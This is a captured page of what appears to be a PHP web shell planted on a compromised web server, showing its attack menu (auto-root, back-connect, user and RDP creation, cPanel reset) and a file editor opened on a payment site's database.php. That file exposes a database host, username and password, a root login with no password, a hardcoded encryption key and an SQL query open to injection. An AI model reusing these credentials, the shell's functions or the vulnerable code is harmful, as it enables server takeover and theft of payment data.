Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
temppayment /
pg /
fees-old /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
PHPMailer
[ DIR ]
drwxr-xr-x
_notes
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
language
[ DIR ]
drwxr-xr-x
phpdocs
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
ChangeLog.txt
12.04
KB
-rw-r--r--
LICENSE
26.29
KB
-rw-r--r--
README
6.7
KB
-rw-r--r--
class.phpmailer.php
57.66
KB
-rw-r--r--
class.pop3.php
10.21
KB
-rw-r--r--
class.smtp.php
31.74
KB
-rw-r--r--
codeworxtech.html
8.92
KB
-rw-r--r--
database.php
2.36
KB
-rw-r--r--
tc_calendar.php
16.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : database.php
<?php //$server="127.0.0.1,1433"; //For Database of My Sql Server session_start(); $server="hostingdb.gotonames.com"; $username="iiitd"; $password="iiitdpassword"; $db_connection = mysql_connect("$server", "$username", "$password"); if(!$db_connection) { print("Error: " . mysql_error()); } $db_name="iiitd"; $db_select=mysql_select_db ($db_name, $db_connection); if(!$db_select) { print("Error: " . mysql_error()); } function isloggedin() { if(isset($_SESSION['id'])) { return true; } else { return false; } } function showpayments($id) { $sqlpayment = "Select * from payment where mid = ".$id." order by pid DESC"; $db_connection = mysql_connect("localhost", "root", ""); $resultpayment = mysql_query($sqlpayment,$db_connection); if($rowpayment=mysql_fetch_array($resultpayment)) // payment already submitted { ?><h2 align="center">Payment details you had submitted</h2> <table id="table_results" align="center" border="2" width="60%" cellpadding="0"> <thead><tr align="center"> <th>Mode of Payment</th> <th>Status</th> <th>Date</th> <th>Amount</th> <th>Details</th> </tr> </thead><tbody> <?php do { ?> <tr align="center"> <td ><?php echo $rowpayment["pmode"]?></td> <td ><?php echo $rowpayment["Status"]?></td> <td ><?php echo $rowpayment["PDate"]?></td> <td ><?php echo $rowpayment["Amount"]?></td> <td ><?php echo $rowpayment["Details"]?></td> </tr> <?php } while($rowpayment=mysql_fetch_array($resultpayment))?> </tbody> </table><?php } } function encrypt($tstr) { $key = "kumar"; $td = mcrypt_module_open('tripledes', '', 'ecb', ''); $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($td), MCRYPT_RAND); mcrypt_generic_init($td, $key, $iv); $encrypted_data = mcrypt_generic($td, $tstr); mcrypt_generic_deinit($td); mcrypt_module_close($td); return addslashes($encrypted_data); } function decrypt($tstr) { $key = "kumar"; $td = mcrypt_module_open('tripledes', '', 'ecb', ''); $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($td), MCRYPT_RAND); mcrypt_generic_init($td, $key, $iv); $encrypted_data = mdecrypt_generic($td, $tstr); mcrypt_generic_deinit($td); mcrypt_module_close($td); return $encrypted_data; } ?>
Close